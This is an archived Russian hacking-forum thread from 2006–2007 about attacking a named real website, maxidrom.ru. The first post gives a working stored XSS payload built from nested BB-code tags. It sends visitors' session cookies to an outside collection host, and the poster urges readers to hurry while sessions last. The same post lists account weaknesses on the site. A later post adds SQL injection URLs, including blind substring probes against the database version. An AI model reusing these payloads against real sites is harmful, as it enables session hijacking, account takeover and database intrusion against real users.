Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   maxidrom.ru/forum/ активная XSS (https://forum.antichat.xyz/showthread.php?t=19884)

Elekt 30.05.2006 01:23

maxidrom.ru/forum/ активная XSS
 
Обнаружена активная хсс в движке Максидрома. Нет проверки спаренных ВВ-тегов:

PHP код:

[email]re@re[url=http://www.re.com'='][/url].com[/email] ' style='background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)' 

В опере не пашет, в FF не проверял.
Время сессии - сутки. Торопитесь =]


Пара коментов:
- отутствеует всякая проверка на регистрацию
- отсутствует ретрив пароля на мыло(если забыл - твои проблемы)
- можно сменить ЛЮБЫЕ данные в профиле БЕЗ ввода старого пароля, для смены пароля нужно знать старый


c411k 15.02.2007 12:18

http://www.maxidrom.ru/howwas/?y=2555+order+by+9--
http://www.maxidrom.ru/howwas/?y=2555&a=2558+order+by+9--
http://www.maxidrom.ru/popfoto.aspx?cid=2571+and(ascii(substring(@@versio n,1,1))>1)--

юнион не выводит, так что только substring. жаль форум у них умер..


Время: 00:58